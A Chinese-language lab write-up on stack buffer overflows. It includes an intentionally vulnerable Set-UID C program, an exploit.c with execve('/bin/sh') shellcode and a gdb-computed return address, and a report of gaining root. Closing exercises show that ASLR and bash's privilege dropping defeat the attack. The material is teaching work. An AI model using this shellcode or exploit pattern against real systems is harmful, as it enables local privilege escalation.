缓冲区溢出攻击实验
缓冲区溢出攻击实验
一、实验原理
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。
程序执行映像如下:
低地址 | Code | Data | Heap | Stack | 高地址 |
---|---|---|---|---|---|
调用函数时堆栈状态如下:
高地址 | 参数2 | 参数1 | PC | FP | 局部变量1 | 局部变量2 | .... | 临时空间 | 低地址 |
---|---|---|---|---|---|---|---|---|---|
FP($ebp内容) | SP($esp内容) |
缓冲区溢出攻击借助C语言库函数strcpy()没有边界检查的漏洞,将存储攻击代码的内存地址覆盖掉PC的地址,从而使调用过程结束时返回到攻击代码(shell code)的存储地址使攻击代码被执行。
二、实验环境
优麒麟 5.10 64位(ubuntu 20.04.2 LTS x64)
三、实验准备
实验环境的是 64 位 Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。
sudo apt-get update
sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
sudo apt-get install gdb
四、实验过程
1、初始设置
- Ubuntu 和其他一些 Linux 系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中,我们使用以下命令关闭这一功能:
- 为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限,这个防护措施在 /bin/bash 中实现。linux中,/bin/sh实际是指向 /bin/bash 或 /bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个 shell 程序(zsh)代替 /bin/bash。下面的指令描述了如何设置 zsh 程序:
2、shellcode
一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是 shellcode
观察以下代码:
#include <stdio.h>
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
本次实验的 shellcode,就是刚才代码的汇编版本:
3、漏洞程序
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char *argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Return Properly\n");
return 1;
}
该程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。
- 输入命令
linux32
,进入32位环境 - 编译该程序,并设置 SET-UID
- GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用
–fno-stack-protector
关闭这种机制。 而-z execstack
用于允许执行栈。-g
参数是为了使编译后得到的可执行文档能用gdb
调试。
4、攻击程序
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x31\xc0" //xorl %eax,%eax
"\x50" //pushl %eax
"\x68""//sh" //pushl $0x68732f2f
"\x68""/bin" //pushl $0x6e69622f
"\x89\xe3" //movl %esp,%ebx
"\x50" //pushl %eax
"\x53" //pushl %ebx
"\x89\xe1" //movl %esp,%ecx
"\x99" //cdq
"\xb0\x0b" //movb $0x0b,%al
"\xcd\x80" //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址
strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer,偏移量设为了 100
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
- 注意上面的代码,
\x??\x??\x??\x??
处需要添上shellcode
保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回(PC)地址。而strcpy(buffer+100,shellcode);
这一句又告诉我们,shellcode
保存在buffer + 100
的位置。 - 现在我们要得到 shellcode 在内存中的地址,输入命令进入 gdb 调试:
得到如下结果:
* <+19>
执行后的(esp 值就是 str 的起始地址,所以我们在地址 0x56556279
处设置断点,以获得<+19>
执行后的)esp值。
- 最后获得的$esp值
0xffffd2a0
就是 str 的地址。 - 根据语句
strcpy(buffer + 100,shellcode);
我们计算shellcode
的地址为0xffffd2a0
+0x64
=0xffffd304
- 修改
exploit.c
文件,将\x??\x??\x??\x??
修改为计算结果\x04\xd3\xff\xff
,因为strcpy()
在堆栈中是从低地址向高地址复制所以是以反序填入。
5、攻击结果
- 编译
exploit.c
程序,并依次运行exploit
与stack
* 可见通过攻击获得了root权限
五、练习
1、通过命令 sudo sysctl -w kernel.randomize_va_space=2
打开系统的地址空间随机化机制,重复用 exploit 程序攻击 stack 程序,观察能否攻击成功,能否获得root权限。
可见随着系统地址空间随机化机制打开,无法计算出PC所存储在堆栈中的地址,所以攻击失败。
2、将 /bin/sh
重新指向 /bin/bash
(或/bin/dash
),观察能否攻击成功,能否获得 root 权限。
可见/bin/bash shell可以防止自身在set-uid进程中执行,如果检测到执行则会将程序用户ID更改为真实用户ID,删除特权,所以攻击失败。